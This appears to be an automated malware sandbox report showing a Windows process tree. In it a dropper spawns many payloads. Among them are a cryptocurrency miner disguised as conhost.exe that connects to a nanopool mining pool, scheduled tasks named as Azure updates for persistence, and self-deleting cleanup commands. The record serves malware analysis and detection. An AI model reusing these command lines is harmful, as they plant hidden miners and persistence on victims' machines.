                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                              PID:6816
                                                                                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                              C:\Windows/System32\conhost.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14444 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=60 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth
                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                PID:3864
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Fri192902b3c24.exe
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                PID:4420
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri192902b3c24.exe
                                                                                                                                                                                                                  Fri192902b3c24.exe
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                  PID:4552
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im Fri192902b3c24.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri192902b3c24.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:7132
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                        taskkill /im Fri192902b3c24.exe /f
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                        PID:6076
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                        PID:6320
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri19d30056588.exe
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                  PID:4432
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri19d30056588.exe
                                                                                                                                                                                                                    Fri19d30056588.exe
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:4564
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:2476
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:3760
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri19b9b73e83c948b1d.exe /mixone
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:3024
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri19b9b73e83c948b1d.exe
                                                                                                                                                                                                                      Fri19b9b73e83c948b1d.exe /mixone
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:4484
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 656
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                        PID:4400
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 672
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5808
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 632
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:2236
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 696
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5188
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 880
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5824
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 936
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:1568
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 1092
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                        PID:5688
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri192b9eeaa03b.exe
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                    PID:3588
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri192b9eeaa03b.exe
                                                                                                                                                                                                                      Fri192b9eeaa03b.exe
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:1640
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-DQROD.tmp\Fri192b9eeaa03b.tmp
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-DQROD.tmp\Fri192b9eeaa03b.tmp" /SL5="$301E6,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri192b9eeaa03b.exe"
                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        PID:2760
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-3LJM8.tmp\46807GHF____.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-3LJM8.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                          PID:5092
                                                                                                                                                                                                                          • C:\Program Files\Google\BWPLDECWDX\ultramediaburner.exe
                                                                                                                                                                                                                            "C:\Program Files\Google\BWPLDECWDX\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:2636
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-SPLAT.tmp\ultramediaburner.tmp
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-SPLAT.tmp\ultramediaburner.tmp" /SL5="$302EC,281924,62464,C:\Program Files\Google\BWPLDECWDX\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                              PID:5256
                                                                                                                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:6340
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\3c-9bc18-2c0-48593-b1b461bccc056\Vigaesakexo.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\3c-9bc18-2c0-48593-b1b461bccc056\Vigaesakexo.exe"
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5332
                                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                                                                                                              dw20.exe -x -s 1348
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:4036
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\c3-dae56-65e-557b7-b723445b8f577\Gaejilulado.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\c3-dae56-65e-557b7-b723445b8f577\Gaejilulado.exe"
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:6208
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri1921f7a9d3.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri1921f7a9d3.exe
                                                                                                                                                                                                                        Fri1921f7a9d3.exe
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:4560
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Fri192f077acf656dd.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                      PID:3388
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri192f077acf656dd.exe
                                                                                                                                                                                                                        Fri192f077acf656dd.exe
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:4632
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                          PID:4464
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            PID:5780
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                              PID:6856
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:3760
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\6.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\6.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:2756
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 2756 -s 1540
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              PID:6008
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\7.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4936
                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4936 -s 1292
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                              PID:6016
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                            PID:4280
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c Fri19870e2febf5544.exe
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:3092
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri19870e2febf5544.exe
                                                                                                                                                                                                                            Fri19870e2febf5544.exe
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                            PID:1000
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri19ca03f05489b.exe
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:4712
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri19ca03f05489b.exe
                                                                                                                                                                                                                              Fri19ca03f05489b.exe
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:3904
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri19927b4fe38a9d1.exe
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:3848
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0835FC44\Fri19927b4fe38a9d1.exe
                                                                                                                                                                                                                                Fri19927b4fe38a9d1.exe
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4792
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A1EE.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A1EE.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:976
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\C48A.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\C48A.exe
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:6568
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C48A.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\C48A.exe
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                            PID:5512
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls "C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:4844
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C48A.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\C48A.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                PID:4476
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C48A.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\C48A.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                    PID:5152
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build2.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build2.exe"
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:4528
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build2.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build2.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                        PID:3032
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                            PID:4760
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              taskkill /im build2.exe /f
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:2360
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                              PID:4312
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build3.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build3.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                        PID:3844
                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build3.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\295cc04a-6e58-4a3b-83a5-37d3e747b813\build3.exe"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:5280
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                              PID:5460
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\F465.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\F465.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  PID:5252
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F465.exe"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4584
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                        timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                                                                        PID:5572
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9N5dA8eT3n.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\9N5dA8eT3n.exe"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:3168
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                          PID:4632
                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2676
                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:2652
                                                                                                                                                                                                                                        • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                                                                                                                                                          wmiadap.exe /F /T /R
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:5764
                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:2424
                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:1924
                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:1448
                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:1268
                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:1260
                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:1108
                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        PID:360
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\gahubbb
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\gahubbb
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                          PID:6812
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2696
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                              PID:788
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\gahubbb
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\gahubbb
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:7392
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe --Task
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:7844
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe --Task
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:2628
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\gahubbb
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\gahubbb
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:3984
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe --Task
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:7920
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\e0f50d20-3dbf-473a-b27e-8463f8e43705\C48A.exe --Task
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:6412
                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:984
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:800
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5452
